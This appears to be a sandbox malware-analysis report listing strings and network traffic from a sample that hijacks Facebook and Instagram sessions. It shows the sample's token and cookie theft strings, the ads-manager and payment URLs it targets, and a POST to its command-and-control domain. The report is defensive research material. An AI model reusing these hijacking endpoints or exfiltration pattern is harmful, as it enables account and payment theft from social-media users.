Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exe String found in binary or memory: http://www.facebook.com/pages/VB-Audio-Software/396002733802606 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exe String found in binary or memory: qSOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio{83da6326-97a6-4088-9453-a1923f573b29},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},3{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},6{e4870e26-3cc5-4cd2-ba46-ca0a9a70ed04},0{f19f064d-082c-4e27-bc73-6882a1bb8e4c},0FRCFLCBRBLLFFCFRFLIsWow64ProcessKernel32.dllArial-inf db%0.1f db%0.1f %%%i bits%i Hz%i-Input Levelsb1024:b512:b256:b128:Init:Pull loss:Push loss:Buffers:StatisticsOutputres:sr:ch:Input%i smpMax Latency:Internal SR:%i.%i.%i.%iDriver Version:VB-Audio Virtual CableDriver Name:SYSTEM\CurrentControlSet\Services\VB-CableSOFTWARE\VB-Audio\CableVBAudioCableWDM_SRVBAudioCableWDMhttp://www.vb-audio.comhttp://www.facebook.com/pages/VB-Audio-Software/396002733802606The change will take effect on next launch... equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: 84cfba021a5a6662.xyz
Source: unknown HTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 82Host: 84cfba021a5a6662.xyz
Source: 56BB1610C0318054.exe, 00000004.00000003.259407630.0000000002F51000.00000004.00000001.sdmp String found in binary or memory: http://84CFBA021A5A6662.xyz/
Source: 56BB1610C0318054.exe, 00000002.00000003.329844310.0000000002AB7000.00000004.00000040.sdmp String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/ddd
Source: 56BB1610C0318054.exe, 00000002.00000003.329844310.0000000002AB7000.00000004.00000040.sdmp String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/g
Source: 56BB1610C0318054.exe, 00000002.00000003.329844310.0000000002AB7000.00000004.00000040.sdmp String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/w
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.258915262.0000000002F77000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.258939900.0000000002F4E000.00000004.00000001.sdmp String found in binary or memory: http://clients2.google.com/service/update2/crx
Source: 1611971443428.exe.2.dr String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1611971443428.exe.2.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1611971443428.exe.2.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: Cyfj6XGbkd.exe String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: 56BB1610C0318054.exe String found in binary or memory: http://docs.google.com/
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: http://docs.google.com/x
Source: 56BB1610C0318054.exe, 00000002.00000003.277066236.00000000031B9000.00000004.00000001.sdmp String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: 56BB1610C0318054.exe String found in binary or memory: http://drive.google.com/
Source: 56BB1610C0318054.exe, 00000002.00000003.277066236.00000000031B9000.00000004.00000001.sdmp String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: 56BB1610C0318054.exe, 00000002.00000003.277066236.00000000031B9000.00000004.00000001.sdmp String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_use
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: 1611971443428.exe.2.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.digicert.com0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.digicert.com0B
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.digicert.com0E
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.digicert.com0F
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.digicert.com0K
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.digicert.com0M
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0P
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0R
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: Cyfj6XGbkd.exe String found in binary or memory: http://ocsp.thawte.com0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: download_engine.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: download_engine.dll.2.dr String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 56BB1610C0318054.exe, 00000002.00000003.277318880.000000000311B000.00000004.00000001.sdmp String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: Cyfj6XGbkd.exe String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: Cyfj6XGbkd.exe String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: Cyfj6XGbkd.exe String found in binary or memory: http://sf.symcd.com0&
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
